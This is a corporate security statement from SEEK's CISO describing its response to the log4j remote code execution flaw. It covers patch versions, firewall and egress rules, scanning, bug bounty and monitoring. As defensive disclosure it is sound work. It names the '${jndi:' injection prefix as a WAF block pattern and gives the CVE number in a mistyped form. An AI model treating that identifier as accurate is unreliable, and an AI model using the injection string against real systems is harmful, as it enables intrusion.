11 December 2021
(Updated 20 December 2021)
It was recently announced that log4j, a popular logging library used by many Java applications, is vulnerable to remote code execution (CVE-2021–4428) and recognise that you are tracking this rapidly evolving issue across your vendors. This is a summary of SEEK’s response to date, but as this is an active investigation, our ability to respond to custom questionnaires at this time is limited.
Immediately following the disclosure of the log4j vulnerability, SEEK’s Cyber Security team began investigating the impact to our internal systems and our customers, job seekers, and hirers. We take these vulnerabilities very seriously and this was made a top priority at a company level by SEEK’s CEO.
We had identified a number of services leveraging the impacted version of log4j and these were quickly remediated by our engineering teams. After extensive and continued examination, we have found no indication of compromise to any customer, job seeker, or hirer data as at the time of publishing this statement. We already had multiple levels of mitigation across our environments in place when this vulnerability was announced, and have implemented additional controls to directly address this risk. A detailed summary of those controls is outlined below:
- Applied the updates to our systems and source code repositories, initially deploying version 2.15 and later moving to version 2.16 and most recently version 2.17 after updated guidance.
- Deployment of web application firewall rules including any modification or obfuscations to block any probing for ${jndi: string that would attempt a WAF bypass.
- Scanning for the log4j functionality is present outside of an easily found log4j .jar file.
- Implementing outbound egress filtering on the network firewalls along with updating the signatures for blocking log4j related threat scanning traffic.
- Leveraging an attack surface management (ASM) platform that monitors our attack surface ongoing to discover, inventory and assess our digital assets that are exposed to external attack.
- Running a public bug bounty program across SEEK — https://bugcrowd.com/seek
- Continuously running penetration testing and red team simulations through hands-on analysis completed by SEEK’s Offensive Security team and by our breach and attack simulation platform.
- Engaged with our external 24/7 managed security operations centre (MSOC) provider to gain insights into how they are integrating additional detection strategies for this risk.
- Updating all security solutions such as EDR, vulnerability management platforms, dependency vulnerability platform, NDR, to make sure that they have the necessary signatures or details to detect threat and vulnerability related activity.
- Our security incident response and threat intelligence teams continue to actively monitor the situation, incorporating new advisories into our strategy as is appropriate.
- We continue to work with our peers across the information security community by sharing indicators of compromise, mitigation guidance and intelligence on how the vulnerability is being abused. As new information emerges, we will adjust our approach accordingly.
- Tracking the public statements of each vulnerable vendor and where practical, services have been patched. In cases where updates have not been made available, we have deployed other countermeasures and will follow up with patches as they are released.
Liam Connolly
Chief Information Security Officer
SEEK Ltd.
